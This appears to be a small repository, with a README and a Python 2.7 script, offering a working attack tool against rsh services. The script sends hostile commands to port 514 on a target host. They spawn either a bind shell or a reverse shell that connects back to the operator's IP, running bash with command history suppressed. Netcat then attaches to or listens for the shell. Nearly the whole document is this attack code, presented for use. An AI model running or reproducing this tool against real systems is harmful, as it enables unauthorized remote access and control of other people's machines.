├── README.md
└── rsh.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Rshell
 2 | Working Rsh Client With Bind And Reverse Shell <br />
 3 | Dependencies: <br />
 4 | Python2.7 <br />
 5 | Netcat <br />
 6 | 
 7 | Use Rsh To Get A Interactive Shell :) <br />
 8 | Usage: <br />
 9 | ./rsh.py 10.10.10.10 foobar foobar  <br />
10 | ./rsh.py ipaddr fromusr usrname  <br />
11 | 
12 | Bugs: <br />
13 | No Bugs Anymore
14 | 


--------------------------------------------------------------------------------
/rsh.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python2.7
 2 | #Rsh Shell
 3 | import sys
 4 | import socket
 5 | import random
 6 | import time
 7 | import subprocess
 8 | import signal
 9 | 
10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11 | 
12 | def getNetworkIp():
13 |     s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
14 |     s.connect(('www.google.com', 0))
15 |     return s.getsockname()[0]
16 | 
17 | def RunBindShell():
18 |     BINDSHELL = 'python -c "import os,pty,socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.bind((\'0.0.0.0\', %s));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);os.putenv(\'HISTFILE\',\'/dev/null\');pty.spawn(\'/bin/bash\');s.close()"'%(bindport)
19 |     s.bind(('0.0.0.0', myport))
20 |     s.connect((host,514))
21 |     SEND="%s\0%s\0%s\0" % (fromuser, username, BINDSHELL)
22 |     s.send("\0")
23 |     s.send(SEND)
24 |     time.sleep(0.5)
25 |     test = s.recv(1024)
26 |     s.close()
27 |     print 'Using Netcat To Connect To %s On Port %s\nType Exit Into The Shell Properly Kill The Open Port\n----------------------------------------------------'% (host,bindport)
28 |     subprocess.call(['nc' , str(host), bindport])
29 |     
30 | def RunReverseShell():
31 |     uselocalip = raw_input('Get Ip Automatically? y/n:')
32 |     if uselocalip.lower() =="y":
33 |         localip = getNetworkIp()
34 |     else: 
35 |         localip = raw_input('Type Your Ip For Reverse Connection:')
36 |     print "Ip Changed To %s"%(localip)
37 |     REVERSESHELL = 'python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'%s\',%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.putenv(\'HISTFILE\',\'/dev/null\');pty.spawn(\'/bin/bash\');s.close()"'%(localip, bindport)
38 |     s.bind(('0.0.0.0', myport))
39 |     s.connect((host,514))
40 |     SEND="%s\0%s\0%s\0" % (fromuser, username, REVERSESHELL)
41 |     s.send("\0")
42 |     s.send(SEND)
43 |     print 'Using Netcat To Listen To On Port %s\nType Exit Into The Shell Properly Kill The Open Port\n----------------------------------------------------'% bindport
44 |     subprocess.call(['nc' ,'-lp', bindport])
45 |     time.sleep(0.5)
46 |     test = s.recv(1024)
47 |     s.close()
48 | 
49 | 
50 | if len(sys.argv) < 4:
51 |     print "Example ./rsh.py 10.10.10.10(ip) foobar(fromuser) foobar(username)"
52 |     sys.exit()
53 | else:
54 |     host = sys.argv[1]
55 |     fromuser = sys.argv[2]
56 |     username = sys.argv[3]
57 | 
58 | myport =  random.randrange(600, 900)
59 | bindport =  str(random.randrange(5000,6000))
60 | 
61 | 
62 | 
63 | payloadtype = raw_input('------------------------\n1.)Reverse Shell \n2.)Bind Shell\n------------------------\nChoose Your Option:')
64 | if payloadtype ==("2"):
65 |     RunBindShell()
66 | elif payloadtype ==("1"):
67 |     RunReverseShell()
68 | else:
69 |     print "Invalid Option"
70 |     sys.exit()
71 | 


--------------------------------------------------------------------------------